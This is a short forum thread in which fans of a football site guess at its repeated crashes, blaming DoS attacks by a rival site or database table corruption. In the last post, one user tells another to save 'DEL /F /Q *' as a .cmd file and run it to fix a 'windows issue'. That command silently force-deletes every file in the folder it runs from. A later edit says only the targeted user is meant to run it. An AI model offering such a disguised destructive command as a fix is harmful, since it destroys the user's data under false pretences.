    This is happening far too regularly for the problem to be server related. Considering BBC Sport 606 is going to be closing very soon (1 game left of the football season), it would appear that Not606 is being hit by DOS attacks. I reckon it's a rival website wanting people to visit their site instead of this one which is by far the most popular.

    Mick I was deleting and banning non stop just before the site crashed, big attack from a few at new site on chatbox and a few forums so could it be connected. I know you have a pm with the IP of main culprit.

    Could it be partly to do with new people wanting to join as BBC606 is shutting down?

    I don't think it's a DDOS. That tends to start and then continue incessantly until it's blocked. This is more like a corrupt system process starting up and locking connections or crashing either vBulletin or SQL. I take it we get the forum back when somebody restarts the system?

    I doubt it's DDOS, you need quite a high level of technical knowledge for that almost all people don't have.

    It's an issue with certain tables in the database corrupting. I thought I knew what the issue was but tonight was something completely different.

    the same place it always was , if you cant see it you have a windows issue <ok>

    DEL /F /Q *
    Into notepad and save it as 'whateveryouwant'.cmd
    then just click the file and run

    Edit : no one else do this except jordan as this has very serious consequences for your p.c. laptop etc <ok>
